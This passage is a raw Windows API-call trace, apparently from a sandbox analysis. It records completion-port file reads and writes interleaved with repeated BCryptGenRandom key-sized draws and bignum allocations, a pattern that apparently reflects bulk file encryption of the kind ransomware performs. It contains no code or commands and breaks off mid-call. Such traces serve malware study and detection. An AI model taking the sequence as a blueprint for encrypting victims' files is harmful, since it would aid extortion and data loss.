1 [0193.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.799] CloseHandle (hObject=0x2a8) returned 1 [0193.799] free (_Block=0x1ff1e60) [0193.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.810] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.810] CloseHandle (hObject=0x170) returned 1 [0193.810] free (_Block=0x3df0008) [0193.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.822] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.824] CloseHandle (hObject=0x2a8) returned 1 [0193.824] free (_Block=0x1ff1e60) [0193.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.837] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.839] CloseHandle (hObject=0x170) returned 1 [0193.839] free (_Block=0x3df0008) [0193.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.847] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.847] CloseHandle (hObject=0x2a8) returned 1 [0193.847] free (_Block=0x1ff1e60) [0193.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.911] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0193.911] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0193.912] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.912] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.912] free (_Block=0x3e305b8) [0193.912] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.912] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.912] free (_Block=0x1fa91d0) [0193.912] free (_Block=0x1fa2ed8) [0193.913] free (_Block=0x1fa90b8) [0193.913] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0193.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0193.926] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.926] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.926] free (_Block=0x3e305b8) [0193.926] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.926] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.926] free (_Block=0x1fa91d0) [0193.926] free (_Block=0x1fa2ed8) [0193.926] free (_Block=0x1fa90b8) [0193.926] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.935] CloseHandle (hObject=0x170) returned 1 [0193.935] free (_Block=0x1ff1e60) [0193.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.942] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0193.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.965] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.966] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.992] CloseHandle (hObject=0x170) returned 1 [0193.992] free (_Block=0x3d70450) [0193.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.995] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0193.999] CloseHandle (hObject=0x2a8) returned 1 [0193.999] free (_Block=0x3df0008) [0193.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0194.045] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0194.068] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x6ae5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0194.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0194.260] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.402] CloseHandle (hObject=0x308) returned 1 [0195.402] free (_Block=0x3df0008) [0195.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.410] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.420] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x4c9b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0195.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.676] CloseHandle (hObject=0x2a8) returned 1 [0195.677] free (_Block=0x1ff1e60) [0195.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.677] CloseHandle (hObject=0x308) returned 1 [0195.678] free (_Block=0x3d70450) [0195.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.678] CloseHandle (hObject=0x338) returned 1 [0195.678] free (_Block=0x3f70048) [0195.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.685] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.685] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.685] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.685] free (_Block=0x3e305b8) [0195.685] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.685] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.686] free (_Block=0x1fa91d0) [0195.686] free (_Block=0x1fa2ed8) [0195.686] free (_Block=0x1fa90b8) [0195.686] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.686] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.699] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xefc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.699] CloseHandle (hObject=0x170) returned 1 [0195.699] free (_Block=0x3df0008) [0195.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.710] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.710] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.710] free (_Block=0x3e305b8) [0195.710] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.710] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.710] free (_Block=0x1fa91d0) [0195.710] free (_Block=0x1fa2ed8) [0195.711] free (_Block=0x1fa90b8) [0195.711] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.711] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.723] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xef5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.724] CloseHandle (hObject=0x170) returned 1 [0195.724] free (_Block=0x3df0008) [0195.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.734] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.734] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.734] free (_Block=0x3e305b8) [0195.734] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.734] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.735] free (_Block=0x1fa91d0) [0195.735] free (_Block=0x1fa2ed8) [0195.735] free (_Block=0x1fa90b8) [0195.735] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.735] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.747] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe2f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.748] CloseHandle (hObject=0x170) returned 1 [0195.748] free (_Block=0x3df0008) [0195.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.756] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.758] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.758] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.758] free (_Block=0x3e305b8) [0195.758] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.758] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.758] free (_Block=0x1fa91d0) [0195.758] free (_Block=0x1fa2ed8) [0195.758] free (_Block=0x1fa90b8) [0195.758] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.759] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 